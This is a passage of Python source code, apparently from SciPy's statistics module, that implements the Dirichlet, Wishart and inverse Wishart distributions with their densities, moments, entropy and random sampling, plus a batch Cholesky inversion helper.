The array returned by the rvs function is transposed
with respect to the format expected by the pdf and logpdf.
"""
def __init__(self, seed=None):
super(dirichlet_gen, self).__init__(seed)
self.__doc__ = doccer.docformat(self.__doc__, dirichlet_docdict_params)
def __call__(self, alpha, seed=None):
return dirichlet_frozen(alpha, seed=seed)
def _logpdf(self, x, alpha):
"""
Parameters
----------
x : ndarray
Points at which to evaluate the log of the probability
density function
%(_dirichlet_doc_default_callparams)s
Notes
-----
As this function does no argument checking, it should not be
called directly; use 'logpdf' instead.
"""
lnB = _lnB(alpha)
return - lnB + np.sum((np.log(x.T) * (alpha - 1)).T, 0)
def logpdf(self, x, alpha):
"""
Log of the Dirichlet probability density function.
Parameters
----------
x : array_like
Quantiles, with the last axis of `x` denoting the components.
%(_dirichlet_doc_default_callparams)s
Returns
-------
pdf : ndarray
Log of the probability density function evaluated at `x`.
"""
alpha = _dirichlet_check_parameters(alpha)
x = _dirichlet_check_input(alpha, x)
out = self._logpdf(x, alpha)
return _squeeze_output(out)
def pdf(self, x, alpha):
"""
The Dirichlet probability density function.
Parameters
----------
x : array_like
Quantiles, with the last axis of `x` denoting the components.
%(_dirichlet_doc_default_callparams)s
Returns
-------
pdf : ndarray
The probability density function evaluated at `x`.
"""
alpha = _dirichlet_check_parameters(alpha)
x = _dirichlet_check_input(alpha, x)
out = np.exp(self._logpdf(x, alpha))
return _squeeze_output(out)
def mean(self, alpha):
"""
Compute the mean of the dirichlet distribution.
Parameters
----------
%(_dirichlet_doc_default_callparams)s
Returns
-------
mu : scalar
Mean of the Dirichlet distribution
"""
alpha = _dirichlet_check_parameters(alpha)
out = alpha / (np.sum(alpha))
return _squeeze_output(out)
def var(self, alpha):
"""
Compute the variance of the dirichlet distribution.
Parameters
----------
%(_dirichlet_doc_default_callparams)s
Returns
-------
v : scalar
Variance of the Dirichlet distribution
"""
alpha = _dirichlet_check_parameters(alpha)
alpha0 = np.sum(alpha)
out = (alpha * (alpha0 - alpha)) / ((alpha0 * alpha0) * (alpha0 + 1))
return out
def entropy(self, alpha):
"""
Compute the differential entropy of the dirichlet distribution.
Parameters
----------
%(_dirichlet_doc_default_callparams)s
Returns
-------
h : scalar
Entropy of the Dirichlet distribution
"""
alpha = _dirichlet_check_parameters(alpha)
alpha0 = np.sum(alpha)
lnB = _lnB(alpha)
K = alpha.shape[0]
out = lnB + (alpha0 - K) * scipy.special.psi(alpha0) - np.sum(
(alpha - 1) * scipy.special.psi(alpha))
return _squeeze_output(out)
def rvs(self, alpha, size=1, random_state=None):
"""
Draw random samples from a Dirichlet distribution.
Parameters
----------
%(_dirichlet_doc_default_callparams)s
size : int, optional
Number of samples to draw (default 1).
%(_doc_random_state)s
Returns
-------
rvs : ndarray or scalar
Random variates of size (`size`, `N`), where `N` is the
dimension of the random variable.
"""
alpha = _dirichlet_check_parameters(alpha)
random_state = self._get_random_state(random_state)
return random_state.dirichlet(alpha, size=size)
dirichlet = dirichlet_gen()
class dirichlet_frozen(multi_rv_frozen):
def __init__(self, alpha, seed=None):
self.alpha = _dirichlet_check_parameters(alpha)
self._dist = dirichlet_gen(seed)
def logpdf(self, x):
return self._dist.logpdf(x, self.alpha)
def pdf(self, x):
return self._dist.pdf(x, self.alpha)
def mean(self):
return self._dist.mean(self.alpha)
def var(self):
return self._dist.var(self.alpha)
def entropy(self):
return self._dist.entropy(self.alpha)
def rvs(self, size=1, random_state=None):
return self._dist.rvs(self.alpha, size, random_state)
# Set frozen generator docstrings from corresponding docstrings in
# multivariate_normal_gen and fill in default strings in class docstrings
for name in ['logpdf', 'pdf', 'rvs', 'mean', 'var', 'entropy']:
method = dirichlet_gen.__dict__[name]
method_frozen = dirichlet_frozen.__dict__[name]
method_frozen.__doc__ = doccer.docformat(
method.__doc__, dirichlet_docdict_noparams)
method.__doc__ = doccer.docformat(method.__doc__, dirichlet_docdict_params)
_wishart_doc_default_callparams = """\
df : int
Degrees of freedom, must be greater than or equal to dimension of the
scale matrix
scale : array_like
Symmetric positive definite scale matrix of the distribution
"""
_wishart_doc_callparams_note = ""
_wishart_doc_frozen_callparams = ""
_wishart_doc_frozen_callparams_note = \
"""See class definition for a detailed description of parameters."""
wishart_docdict_params = {
'_doc_default_callparams': _wishart_doc_default_callparams,
'_doc_callparams_note': _wishart_doc_callparams_note,
'_doc_random_state': _doc_random_state
}
wishart_docdict_noparams = {
'_doc_default_callparams': _wishart_doc_frozen_callparams,
'_doc_callparams_note': _wishart_doc_frozen_callparams_note,
'_doc_random_state': _doc_random_state
}
class wishart_gen(multi_rv_generic):
r"""
A Wishart random variable.
The `df` keyword specifies the degrees of freedom. The `scale` keyword
specifies the scale matrix, which must be symmetric and positive definite.
In this context, the scale matrix is often interpreted in terms of a
multivariate normal precision matrix (the inverse of the covariance
matrix).
Methods
-------
``pdf(x, df, scale)``
Probability density function.
``logpdf(x, df, scale)``
Log of the probability density function.
``rvs(df, scale, size=1, random_state=None)``
Draw random samples from a Wishart distribution.
``entropy()``
Compute the differential entropy of the Wishart distribution.
Parameters
----------
x : array_like
Quantiles, with the last axis of `x` denoting the components.
%(_doc_default_callparams)s
%(_doc_random_state)s
Alternatively, the object may be called (as a function) to fix the degrees
of freedom and scale parameters, returning a "frozen" Wishart random
variable:
rv = wishart(df=1, scale=1)
- Frozen object with the same methods but holding the given
degrees of freedom and scale fixed.
See Also
--------
invwishart, chi2
Notes
-----
%(_doc_callparams_note)s
The scale matrix `scale` must be a symmetric positive definite
matrix. Singular matrices, including the symmetric positive semi-definite
case, are not supported.
The Wishart distribution is often denoted
.. math::
W_p(\nu, \Sigma)
where :math:`\nu` is the degrees of freedom and :math:`\Sigma` is the
:math:`p \times p` scale matrix.
The probability density function for `wishart` has support over positive
definite matrices :math:`S`; if :math:`S \sim W_p(\nu, \Sigma)`, then
its PDF is given by:
.. math::
f(S) = \frac{|S|^{\frac{\nu - p - 1}{2}}}{2^{ \frac{\nu p}{2} }
|\Sigma|^\frac{\nu}{2} \Gamma_p \left ( \frac{\nu}{2} \right )}
\exp\left( -tr(\Sigma^{-1} S) / 2 \right)
If :math:`S \sim W_p(\nu, \Sigma)` (Wishart) then
:math:`S^{-1} \sim W_p^{-1}(\nu, \Sigma^{-1})` (inverse Wishart).
If the scale matrix is 1-dimensional and equal to one, then the Wishart
distribution :math:`W_1(\nu, 1)` collapses to the :math:`\chi^2(\nu)`
distribution.
.. versionadded:: 0.16.0
References
----------
.. [1] M.L. Eaton, "Multivariate Statistics: A Vector Space Approach",
Wiley, 1983.
.. [2] W.B. Smith and R.R. Hocking, "Algorithm AS 53: Wishart Variate
Generator", Applied Statistics, vol. 21, pp. 341-345, 1972.
Examples
--------
>>> import matplotlib.pyplot as plt
>>> from scipy.stats import wishart, chi2
>>> x = np.linspace(1e-5, 8, 100)
>>> w = wishart.pdf(x, df=3, scale=1); w[:5]
array([ 0.00126156, 0.10892176, 0.14793434, 0.17400548, 0.1929669 ])
>>> c = chi2.pdf(x, 3); c[:5]
array([ 0.00126156, 0.10892176, 0.14793434, 0.17400548, 0.1929669 ])
>>> plt.plot(x, w)
The input quantiles can be any shape of array, as long as the last
axis labels the components.
"""
def __init__(self, seed=None):
super(wishart_gen, self).__init__(seed)
self.__doc__ = doccer.docformat(self.__doc__, wishart_docdict_params)
def __call__(self, df=None, scale=None, seed=None):
"""
Create a frozen Wishart distribution.
See `wishart_frozen` for more information.
"""
return wishart_frozen(df, scale, seed)
def _process_parameters(self, df, scale):
if scale is None:
scale = 1.0
scale = np.asarray(scale, dtype=float)
if scale.ndim == 0:
scale = scale[np.newaxis,np.newaxis]
elif scale.ndim == 1:
scale = np.diag(scale)
elif scale.ndim == 2 and not scale.shape[0] == scale.shape[1]:
raise ValueError("Array 'scale' must be square if it is two"
" dimensional, but scale.scale = %s."
% str(scale.shape))
elif scale.ndim > 2:
raise ValueError("Array 'scale' must be at most two-dimensional,"
" but scale.ndim = %d" % scale.ndim)
dim = scale.shape[0]
if df is None:
df = dim
elif not np.isscalar(df):
raise ValueError("Degrees of freedom must be a scalar.")
elif df < dim:
raise ValueError("Degrees of freedom cannot be less than dimension"
" of scale matrix, but df = %d" % df)
return dim, df, scale
def _process_quantiles(self, x, dim):
"""
Adjust quantiles array so that last axis labels the components of
each data point.
"""
x = np.asarray(x, dtype=float)
if x.ndim == 0:
x = x * np.eye(dim)[:, :, np.newaxis]
if x.ndim == 1:
if dim == 1:
x = x[np.newaxis, np.newaxis, :]
else:
x = np.diag(x)[:, :, np.newaxis]
elif x.ndim == 2:
if not x.shape[0] == x.shape[1]:
raise ValueError("Quantiles must be square if they are two"
" dimensional, but x.shape = %s."
% str(x.shape))
x = x[:, :, np.newaxis]
elif x.ndim == 3:
if not x.shape[0] == x.shape[1]:
raise ValueError("Quantiles must be square in the first two"
" dimensions if they are three dimensional"
", but x.shape = %s." % str(x.shape))
elif x.ndim > 3:
raise ValueError("Quantiles must be at most two-dimensional with"
" an additional dimension for multiple"
"components, but x.ndim = %d" % x.ndim)
# Now we have 3-dim array; should have shape [dim, dim, *]
if not x.shape[0:2] == (dim, dim):
raise ValueError('Quantiles have incompatible dimensions: should'
' be %s, got %s.' % ((dim, dim), x.shape[0:2]))
return x
def _process_size(self, size):
size = np.asarray(size)
if size.ndim == 0:
size = size[np.newaxis]
elif size.ndim > 1:
raise ValueError('Size must be an integer or tuple of integers;'
' thus must have dimension <= 1.'
' Got size.ndim = %s' % str(tuple(size)))
n = size.prod()
shape = tuple(size)
return n, shape
def _logpdf(self, x, dim, df, scale, log_det_scale, C):
"""
Parameters
----------
x : ndarray
Points at which to evaluate the log of the probability
density function
dim : int
Dimension of the scale matrix
df : int
Degrees of freedom
scale : ndarray
Scale matrix
log_det_scale : float
Logarithm of the determinant of the scale matrix
C : ndarray
Cholesky factorization of the scale matrix, lower triagular.
Notes
-----
As this function does no argument checking, it should not be
called directly; use 'logpdf' instead.
"""
# log determinant of x
# Note: x has components along the last axis, so that x.T has
# components alone the 0-th axis. Then since det(A) = det(A'), this
# gives us a 1-dim vector of determinants
# Retrieve tr(scale^{-1} x)
log_det_x = np.zeros(x.shape[-1])
scale_inv_x = np.zeros(x.shape)
tr_scale_inv_x = np.zeros(x.shape[-1])
for i in range(x.shape[-1]):
_, log_det_x[i] = self._cholesky_logdet(x[:,:,i])
scale_inv_x[:,:,i] = scipy.linalg.cho_solve((C, True), x[:,:,i])
tr_scale_inv_x[i] = scale_inv_x[:,:,i].trace()
# Log PDF
out = ((0.5 * (df - dim - 1) * log_det_x - 0.5 * tr_scale_inv_x) -
(0.5 * df * dim * _LOG_2 + 0.5 * df * log_det_scale +
multigammaln(0.5*df, dim)))
return out
def logpdf(self, x, df, scale):
"""
Log of the Wishart probability density function.
Parameters
----------
x : array_like
Quantiles, with the last axis of `x` denoting the components.
Each quantile must be a symmetric positive definite matrix.
%(_doc_default_callparams)s
Returns
-------
pdf : ndarray
Log of the probability density function evaluated at `x`
Notes
-----
%(_doc_callparams_note)s
"""
dim, df, scale = self._process_parameters(df, scale)
x = self._process_quantiles(x, dim)
# Cholesky decomposition of scale, get log(det(scale))
C, log_det_scale = self._cholesky_logdet(scale)
out = self._logpdf(x, dim, df, scale, log_det_scale, C)
return _squeeze_output(out)
def pdf(self, x, df, scale):
"""
Wishart probability density function.
Parameters
----------
x : array_like
Quantiles, with the last axis of `x` denoting the components.
Each quantile must be a symmetric positive definite matrix.
%(_doc_default_callparams)s
Returns
-------
pdf : ndarray
Probability density function evaluated at `x`
Notes
-----
%(_doc_callparams_note)s
"""
return np.exp(self.logpdf(x, df, scale))
def _mean(self, dim, df, scale):
"""
Parameters
----------
dim : int
Dimension of the scale matrix
%(_doc_default_callparams)s
Notes
-----
As this function does no argument checking, it should not be
called directly; use 'mean' instead.
"""
return df * scale
def mean(self, df, scale):
"""
Mean of the Wishart distribution
Parameters
----------
%(_doc_default_callparams)s
Returns
-------
mean : float
The mean of the distribution
"""
dim, df, scale = self._process_parameters(df, scale)
out = self._mean(dim, df, scale)
return _squeeze_output(out)
def _mode(self, dim, df, scale):
"""
Parameters
----------
dim : int
Dimension of the scale matrix
%(_doc_default_callparams)s
Notes
-----
As this function does no argument checking, it should not be
called directly; use 'mode' instead.
"""
if df >= dim + 1:
out = (df-dim-1) * scale
else:
out = None
return out
def mode(self, df, scale):
"""
Mode of the Wishart distribution
Only valid if the degrees of freedom are greater than the dimension of
the scale matrix.
Parameters
----------
%(_doc_default_callparams)s
Returns
-------
mode : float or None
The Mode of the distribution
"""
dim, df, scale = self._process_parameters(df, scale)
out = self._mode(dim, df, scale)
return _squeeze_output(out) if out is not None else out
def _var(self, dim, df, scale):
"""
Parameters
----------
dim : int
Dimension of the scale matrix
%(_doc_default_callparams)s
Notes
-----
As this function does no argument checking, it should not be
called directly; use 'var' instead.
"""
var = scale**2
diag = scale.diagonal() # 1 x dim array
var += np.outer(diag, diag)
var *= df
return var
def var(self, df, scale):
"""
Variance of the Wishart distribution
Parameters
----------
%(_doc_default_callparams)s
Returns
-------
var : float
The variance of the distribution
"""
dim, df, scale = self._process_parameters(df, scale)
out = self._var(dim, df, scale)
return _squeeze_output(out)
def _standard_rvs(self, n, shape, dim, df, random_state):
"""
Parameters
----------
n : integer
Number of variates to generate
shape : iterable
Shape of the variates to generate
dim : int
Dimension of the scale matrix
df : int
Degrees of freedom
random_state : np.random.RandomState instance
RandomState used for drawing the random variates.
Notes
-----
As this function does no argument checking, it should not be
called directly; use 'rvs' instead.
"""
# Random normal variates for off-diagonal elements
n_tril = dim * (dim-1) // 2
covariances = random_state.normal(
size=n*n_tril).reshape(shape+(n_tril,))
# Random chi-square variates for diagonal elements
variances = np.r_[[random_state.chisquare(df-(i+1)+1, size=n)**0.5
for i in range(dim)]].reshape((dim,) + shape[::-1]).T
# Create the A matri(ces) - lower triangular
A = np.zeros(shape + (dim, dim))
# Input the covariances
size_idx = tuple([slice(None,None,None)]*len(shape))
tril_idx = np.tril_indices(dim, k=-1)
A[size_idx + tril_idx] = covariances
# Input the variances
diag_idx = np.diag_indices(dim)
A[size_idx + diag_idx] = variances
return A
def _rvs(self, n, shape, dim, df, C, random_state):
"""
Parameters
----------
n : integer
Number of variates to generate
shape : iterable
Shape of the variates to generate
dim : int
Dimension of the scale matrix
df : int
Degrees of freedom
scale : ndarray
Scale matrix
C : ndarray
Cholesky factorization of the scale matrix, lower triangular.
%(_doc_random_state)s
Notes
-----
As this function does no argument checking, it should not be
called directly; use 'rvs' instead.
"""
random_state = self._get_random_state(random_state)
# Calculate the matrices A, which are actually lower triangular
# Cholesky factorizations of a matrix B such that B ~ W(df, I)
A = self._standard_rvs(n, shape, dim, df, random_state)
# Calculate SA = C A A' C', where SA ~ W(df, scale)
# Note: this is the product of a (lower) (lower) (lower)' (lower)'
# or, denoting B = AA', it is C B C' where C is the lower
# triangular Cholesky factorization of the scale matrix.
# this appears to conflict with the instructions in [1]_, which
# suggest that it should be D' B D where D is the lower
# triangular factorization of the scale matrix. However, it is
# meant to refer to the Bartlett (1933) representation of a
# Wishart random variate as L A A' L' where L is lower triangular
# so it appears that understanding D' to be upper triangular
# is either a typo in or misreading of [1]_.
for index in np.ndindex(shape):
CA = np.dot(C, A[index])
A[index] = np.dot(CA, CA.T)
return A
def rvs(self, df, scale, size=1, random_state=None):
"""
Draw random samples from a Wishart distribution.
Parameters
----------
%(_doc_default_callparams)s
size : integer or iterable of integers, optional
Number of samples to draw (default 1).
%(_doc_random_state)s
Returns
-------
rvs : ndarray
Random variates of shape (`size`) + (`dim`, `dim), where `dim` is
the dimension of the scale matrix.
Notes
-----
%(_doc_callparams_note)s
"""
n, shape = self._process_size(size)
dim, df, scale = self._process_parameters(df, scale)
# Cholesky decomposition of scale
C = scipy.linalg.cholesky(scale, lower=True)
out = self._rvs(n, shape, dim, df, C, random_state)
return _squeeze_output(out)
def _entropy(self, dim, df, log_det_scale):
"""
Parameters
----------
dim : int
Dimension of the scale matrix
df : int
Degrees of freedom
log_det_scale : float
Logarithm of the determinant of the scale matrix
Notes
-----
As this function does no argument checking, it should not be
called directly; use 'entropy' instead.
"""
return (
0.5 * (dim+1) * log_det_scale +
0.5 * dim * (dim+1) * _LOG_2 +
multigammaln(0.5*df, dim) -
0.5 * (df - dim - 1) * np.sum(
[psi(0.5*(df + 1 - (i+1))) for i in range(dim)]
) +
0.5 * df * dim
)
def entropy(self, df, scale):
"""
Compute the differential entropy of the Wishart.
Parameters
----------
%(_doc_default_callparams)s
Returns
-------
h : scalar
Entropy of the Wishart distribution
Notes
-----
%(_doc_callparams_note)s
"""
dim, df, scale = self._process_parameters(df, scale)
_, log_det_scale = self._cholesky_logdet(scale)
return self._entropy(dim, df, log_det_scale)
def _cholesky_logdet(self, scale):
"""
Compute Cholesky decomposition and determine (log(det(scale)).
Parameters
----------
scale : ndarray
Scale matrix.
Returns
-------
c_decomp : ndarray
The Cholesky decomposition of `scale`.
logdet : scalar
The log of the determinant of `scale`.
Notes
-----
This computation of ``logdet`` is equivalent to
``np.linalg.slogdet(scale)``. It is ~2x faster though.
"""
c_decomp = scipy.linalg.cholesky(scale, lower=True)
logdet = 2 * np.sum(np.log(c_decomp.diagonal()))
return c_decomp, logdet
wishart = wishart_gen()
class wishart_frozen(multi_rv_frozen):
"""
Create a frozen Wishart distribution.
Parameters
----------
df : array_like
Degrees of freedom of the distribution
scale : array_like
Scale matrix of the distribution
seed : None or int or np.random.RandomState instance, optional
This parameter defines the RandomState object to use for drawing
random variates.
If None (or np.random), the global np.random state is used.
If integer, it is used to seed the local RandomState instance
Default is None.
"""
def __init__(self, df, scale, seed=None):
self._dist = wishart_gen(seed)
self.dim, self.df, self.scale = self._dist._process_parameters(
df, scale)
self.C, self.log_det_scale = self._dist._cholesky_logdet(self.scale)
def logpdf(self, x):
x = self._dist._process_quantiles(x, self.dim)
out = self._dist._logpdf(x, self.dim, self.df, self.scale,
self.log_det_scale, self.C)
return _squeeze_output(out)
def pdf(self, x):
return np.exp(self.logpdf(x))
def mean(self):
out = self._dist._mean(self.dim, self.df, self.scale)
return _squeeze_output(out)
def mode(self):
out = self._dist._mode(self.dim, self.df, self.scale)
return _squeeze_output(out) if out is not None else out
def var(self):
out = self._dist._var(self.dim, self.df, self.scale)
return _squeeze_output(out)
def rvs(self, size=1, random_state=None):
n, shape = self._dist._process_size(size)
out = self._dist._rvs(n, shape, self.dim, self.df,
self.C, random_state)
return _squeeze_output(out)
def entropy(self):
return self._dist._entropy(self.dim, self.df, self.log_det_scale)
# Set frozen generator docstrings from corresponding docstrings in
# Wishart and fill in default strings in class docstrings
for name in ['logpdf', 'pdf', 'mean', 'mode', 'var', 'rvs', 'entropy']:
method = wishart_gen.__dict__[name]
method_frozen = wishart_frozen.__dict__[name]
method_frozen.__doc__ = doccer.docformat(
method.__doc__, wishart_docdict_noparams)
method.__doc__ = doccer.docformat(method.__doc__, wishart_docdict_params)
from numpy import asarray_chkfinite, asarray
from scipy.linalg.misc import LinAlgError
from scipy.linalg.lapack import get_lapack_funcs
def _cho_inv_batch(a, check_finite=True):
"""
Invert the matrices a_i, using a Cholesky factorization of A, where
a_i resides in the last two dimensions of a and the other indices describe
the index i.
Overwrites the data in a.
Parameters
----------
a : array
Array of matrices to invert, where the matrices themselves are stored
in the last two dimensions.
check_finite : bool, optional
Whether to check that the input matrices contain only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
Returns
-------
x : array
Array of inverses of the matrices ``a_i``.
See also
--------
scipy.linalg.cholesky : Cholesky factorization of a matrix
"""
if check_finite:
a1 = asarray_chkfinite(a)
else:
a1 = asarray(a)
if len(a1.shape) < 2 or a1.shape[-2] != a1.shape[-1]:
raise ValueError('expected square matrix in last two dimensions')
potrf, potri = get_lapack_funcs(('potrf','potri'), (a1,))
tril_idx = np.tril_indices(a.shape[-2], k=-1)
triu_idx = np.triu_indices(a.shape[-2], k=1)
for index in np.ndindex(a1.shape[:-2]):
# Cholesky decomposition
a1[index], info = potrf(a1[index], lower=True, overwrite_a=False,
clean=False)
if info > 0:
raise LinAlgError("%d-th leading minor not positive definite"
% info)
if info < 0:
raise ValueError('illegal value in %d-th argument of internal'
' potrf' % -info)
# Inversion
a1[index], info = potri(a1[index], lower=True, overwrite_c=False)
if info > 0:
raise LinAlgError("the inverse could not be computed")
if info < 0:
raise ValueError('illegal value in %d-th argument of internal'
' potrf' % -info)
# Make symmetric (dpotri only fills in the lower triangle)
a1[index][triu_idx] = a1[index][tril_idx]
return a1
class invwishart_gen(wishart_gen):
r"""
An inverse Wishart random variable.
The `df` keyword specifies the degrees of freedom. The `scale` keyword
specifies the scale matrix, which must be symmetric and positive definite.
In this context, the scale matrix is often interpreted in terms of a
multivariate normal covariance matrix.
Methods
-------
``pdf(x, df, scale)``
Probability density function.
``logpdf(x, df, scale)``
Log of the probability density function.
``rvs(df, scale, size=1, random_state=None)``
Draw random samples from an inverse Wishart distribution.
Parameters
----------
x : array_like
Quantiles, with the last axis of `x` denoting the components.
%(_doc_default_callparams)s
%(_doc_random_state)s
Alternatively, the object may be called (as a function) to fix the degrees
of freedom and scale parameters, returning a "frozen" inverse Wishart
random variable:
rv = invwishart(df=1, scale=1)
- Frozen object with the same methods but holding the given
degrees of freedom and scale fixed.
See Also
--------
wishart
Notes
-----
%(_doc_callparams_note)s
The scale matrix `scale` must be a symmetric positive definite
matrix. Singular matrices, including the symmetric positive semi-definite
case, are not supported.
The inverse Wishart distribution is often denoted
.. math::
W_p^{-1}(\nu, \Psi)
where :math:`\nu` is the degrees of freedom and :math:`\Psi` is the
:math:`p \times p` scale matrix.
The probability density function for `invwishart` has support over positive
definite matrices :math:`S`; if :math:`S \sim W^{-1}_p(\nu, \Sigma)`,
then its PDF is given by:
.. math::
f(S) = \frac{|\Sigma|^\frac{\nu}{2}}{2^{ \frac{\nu p}{2} }
|S|^{\frac{\nu + p + 1}{2}} \Gamma_p \left(\frac{\nu}{2} \right)}
\exp\left( -tr(\Sigma S^{-1}) / 2 \right)
If :math:`S \sim W_p^{-1}(\nu, \Psi)` (inverse Wishart) then
:math:`S^{-1} \sim W_p(\nu, \Psi^{-1})` (Wishart).
If the scale matrix is 1-dimensional and equal to one, then the inverse
Wishart distribution :math:`W_1(\nu, 1)` collapses to the
inverse Gamma distribution with parameters shape = :math:`\frac{\nu}{2}`
and scale = :math:`\frac{1}{2}`.
.. versionadded:: 0.16.0
References
----------
.. [1] M.L. Eaton, "Multivariate Statistics: A Vector Space Approach",
Wiley, 1983.
.. [2] M.C. Jones, "Generating Inverse Wishart Matrices", Communications in
Statistics - Simulation and Computation, vol. 14.2, pp.511-514, 1985.
Examples
--------
>>> import matplotlib.pyplot as plt
>>> from scipy.stats import invwishart, invgamma
>>> x = np.linspace(0.01, 1, 100)
>>> iw = invwishart.pdf(x, df=6, scale=1)
>>> iw[:3]
array([ 1.20546865e-15, 5.42497807e-06, 4.45813929e-03])
>>> ig = invgamma.pdf(x, 6/2., scale=1./2)
>>> ig[:3]
array([ 1.20546865e-15, 5.42497807e-06, 4.45813929e-03])
>>> plt.plot(x, iw)
The input quantiles can be any shape of array, as long as the last
axis labels the components.
"""
def __init__(self, seed=None):
super(invwishart_gen, self).__init__(seed)
self.__doc__ = doccer.docformat(self.__doc__, wishart_docdict_params)
def __call__(self, df=None, scale=None, seed=None):
"""
Create a frozen inverse Wishart distribution.
See `invwishart_frozen` for more information.
"""
return invwishart_frozen(df, scale, seed)
def _logpdf(self, x, dim, df, scale, log_det_scale):
"""
Parameters
----------
x : ndarray
Points at which to evaluate the log of the probability
density function.
dim : int
Dimension of the scale matrix
df : int
Degrees of freedom
scale : ndarray
Scale matrix
log_det_scale : float
Logarithm of the determinant of the scale matrix
Notes
-----
As this function does no argument checking, it should not be
called directly; use 'logpdf' instead.
"""
log_det_x = np.zeros(x.shape[-1])
#scale_x_inv = np.zeros(x.shape)
x_inv = np.copy(x).T
if dim > 1:
_cho_inv_batch(x_inv) # works in-place
else:
x_inv = 1./x_inv
tr_scale_x_inv = np.zeros(x.shape[-1])
for i in range(x.shape[-1]):
C, lower = scipy.linalg.cho_factor(x[:,:,i], lower=True)
log_det_x[i] = 2 * np.sum(np.log(C.diagonal()))
#scale_x_inv[:,:,i] = scipy.linalg.cho_solve((C, True), scale).T
tr_scale_x_inv[i] = np.dot(scale, x_inv[i]).trace()
# Log PDF
out = ((0.5 * df * log_det_scale - 0.5 * tr_scale_x_inv) -
(0.5 * df * dim * _LOG_2 + 0.5 * (df + dim + 1) * log_det_x) -
multigammaln(0.5*df, dim))
return out
def logpdf(self, x, df, scale):
"""
Log of the inverse Wishart probability density function.
Parameters
----------
x : array_like
Quantiles, with the last axis of `x` denoting the components.
Each quantile must be a symmetric positive definite matrix.
%(_doc_default_callparams)s
Returns
-------
pdf : ndarray
Log of the probability density function evaluated at `x`
Notes
-----
%(_doc_callparams_note)s
"""
dim, df, scale = self._process_parameters(df, scale)
x = self._process_quantiles(x, dim)
_, log_det_scale = self._cholesky_logdet(scale)
out = self._logpdf(x, dim, df, scale, log_det_scale)
return _squeeze_output(out)
def pdf(self, x, df, scale):
"""
Inverse Wishart probability density function.
Parameters
----------
x : array_like
Quantiles, with the last axis of `x` denoting the components.
Each quantile must be a symmetric positive definite matrix.
%(_doc_default_callparams)s
Returns
-------
pdf : ndarray
Probability density function evaluated at `x`
Notes
-----
%(_doc_callparams_note)s
"""
return np.exp(self.logpdf(x, df, scale))
def _mean(self, dim, df, scale):
"""
Parameters
----------
dim : int
Dimension of the scale matrix
%(_doc_default_callparams)s
Notes
-----
As this function does no argument checking, it should not be
called directly; use 'mean' instead.
"""
if df > dim + 1:
out = scale / (df - dim - 1)
else:
out = None
return out
def mean(self, df, scale):
"""
Mean of the inverse Wishart distribution
Only valid if the degrees of freedom are greater than the dimension of
the scale matrix plus one.
Parameters
----------
%(_doc_default_callparams)s
Returns
-------
mean : float or None
The mean of the distribution
"""
dim, df, scale = self._process_parameters(df, scale)
out = self._mean(dim, df, scale)
return _squeeze_output(out) if out is not None else out
def _mode(self, dim, df, scale):
"""
Parameters
----------
dim : int
Dimension of the scale matrix
%(_doc_default_callparams)s
Notes
-----
As this function does no argument checking, it should not be
called directly; use 'mode' instead.
"""
return scale / (df + dim + 1)
def mode(self, df, scale):
"""
Mode of the inverse Wishart distribution
Parameters
----------
%(_doc_default_callparams)s
Returns
-------
mode : float
The Mode of the distribution
"""
dim, df, scale = self._process_parameters(df, scale)
out = self._mode(dim, df, scale)
return _squeeze_output(out)
def _var(self, dim, df, scale):
"""
Parameters
----------
dim : int
Dimension of the scale matrix
%(_doc_default_callparams)s
Notes
-----
As this function does no argument checking, it should not be
called directly; use 'var' instead.
"""
if df > dim + 3:
var = (df - dim + 1) * scale**2
diag = scale.diagonal() # 1 x dim array
var += (df - dim - 1) * np.outer(diag, diag)
var /= (df - dim) * (df - dim - 1)**2 * (df - dim - 3)
else:
var = None
return var
def var(self, df, scale):
"""
Variance of the inverse Wishart distribution
Only valid if the degrees of freedom are greater than the dimension of
the scale matrix plus three.
Parameters
----------
%(_doc_default_callparams)s
Returns
-------
var : float
The variance of the distribution
"""
dim, df, scale = self._process_parameters(df, scale)
out = self._var(dim, df, scale)
return _squeeze_output(out) if out is not None else out
def _rvs(self, n, shape, dim, df, C, random_state):
"""
Parameters
----------
n : integer
Number of variates to generate
shape : iterable
Shape of the variates to generate
dim : int
Dimension of the scale matrix
df : int
Degrees of freedom
C : ndarray
Cholesky factorization of the scale matrix, lower triagular.
%(_doc_random_state)s
Notes
-----
As this function does no argument checking, it should not be
called directly; use 'rvs' instead.
"""
random_state = self._get_random_state(random_state)
# Get random draws A such that A ~ W(df, I)
A = super(invwishart_gen, self)._standard_rvs(n, shape, dim,
df, random_state)
# Calculate SA = (CA)'^{-1} (CA)^{-1} ~ iW(df, scale)
eye = np.eye(dim)
trtrs = get_lapack_funcs(('trtrs'), (A,))
for index in np.ndindex(A.shape[:-2]):
# Calculate CA
CA = np.dot(C, A[index])
# Get (C A)^{-1} via triangular solver
if dim > 1:
CA, info = trtrs(CA, eye, lower=True)
if info > 0:
raise LinAlgError("Singular matrix.")
if info < 0:
raise ValueError('Illegal value in %d-th argument of'
' internal trtrs' % -info)
else:
CA = 1. / CA
# Get SA
A[index] = np.dot(CA.T, CA)
return A
def rvs(self, df, scale, size=1, random_state=None):
"""
Draw random samples from an inverse Wishart distribution.
Parameters
----------
%(_doc_default_callparams)s
size : integer or iterable of integers, optional
Number of samples to draw (default 1).
%(_doc_random_state)s
Returns
-------
rvs : ndarray
Random variates of shape (`size`) + (`dim`, `dim), where `dim` is
the dimension of the scale matrix.
Notes
-----
%(_doc_callparams_note)s
"""
n, shape = self._process_size(size)
dim, df, scale = self._process_parameters(df, scale)
# Invert the scale
eye = np.eye(dim)
L, lower = scipy.linalg.cho_factor(scale, lower=True)
inv_scale = scipy.linalg.cho_solve((L, lower), eye)
# Cholesky decomposition of inverted scale
C = scipy.linalg.cholesky(inv_scale, lower=True)
out = self._rvs(n, shape, dim, df, C, random_state)
return _squeeze_output(out)
def entropy(self):
# Need to find reference for inverse Wishart entropy
raise AttributeError
invwishart = invwishart_gen()
class invwishart_frozen(multi_rv_frozen):
def __init__(self, df, scale, seed=None):
"""
Create a frozen inverse Wishart distribution.
Parameters
----------
df : array_like
Degrees of freedom of the distribution
scale : array_like
Scale matrix of the distribution
seed : None or int or np.random.RandomState instance, optional
This parameter defines the RandomState object to use for drawing
random variates.
If None (or np.random), the global np.random state is used.
If integer, it is used to seed the local RandomState instance
Default is None.
"""
self._dist = invwishart_gen(seed)
self.dim, self.df, self.scale = self._dist._process_parameters(
df, scale
)
# Get the determinant via Cholesky factorization
